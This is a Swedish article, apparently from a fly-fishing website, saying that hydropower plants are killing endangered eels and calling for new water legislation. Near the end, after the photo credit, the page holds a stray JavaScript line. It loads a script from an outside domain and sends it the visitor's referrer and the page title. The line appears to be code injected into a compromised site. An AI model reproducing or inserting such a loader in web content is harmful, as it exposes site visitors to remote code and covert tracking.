Ålmassakern fortsätter

Ålen är utrotningshotad och det största hotet mot de vuxna ålarna är kraftverken. Ålarna fastnar på gallren och hackas sönder i turbiner under tiden som Sveriges kraftverksägare vägrar miljöanpassa sig.
Sannolikheten för en vuxen ål att klara sig ut till havet, utan att fastna i ett kraftverk beräknas till fyra procent. Att det finns vandringsvägar för ålar och andra fiskar, borde vara en självklarhet i vårt land. Men kraftindustrin har satt in en stark lobby för stoppa en ny vattenlagstiftning som skulle tvinga dem att ta ansvar.
För varje utvandrande generation ålar som fastnar på galler och i turbiner, närmar sig ålen utrotning. Kraftverksägarna kan lugnt fortsätta sin verksamhet, eftersom det idag inte finns en vattenlagstiftning som tvingar de som tjänar pengar på verksamheten att vidta några åtgärder.
– Politikerna måste ta sitt ansvar för våra gemensamma värden och inte bara lyssna till enskilda kraftverksägare som skriker så fort de hör talas om miljöanpassning, säger Martin Falklind, chefredaktör på Fiskejournalen.
– Vi naturvänner och sportfiskare måste uppenbarligen höja våra röster. Vi är flera miljoner människor. Antalet privata kraftverksägare är inte fler än cirka 1000 stycken. Sedan tillkommer några hundra företag, som E.ON, Vattenfall, Fortum, Statkraft och Jämtkraft. Ska denna lilla grupp få fortsätta förstöra vår gemensamma natur?
Foto: Ingemar Alenäs
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;


MER FRÅN ALLTOMFLUGFISKE.SE

Sponsrad
Sponsrad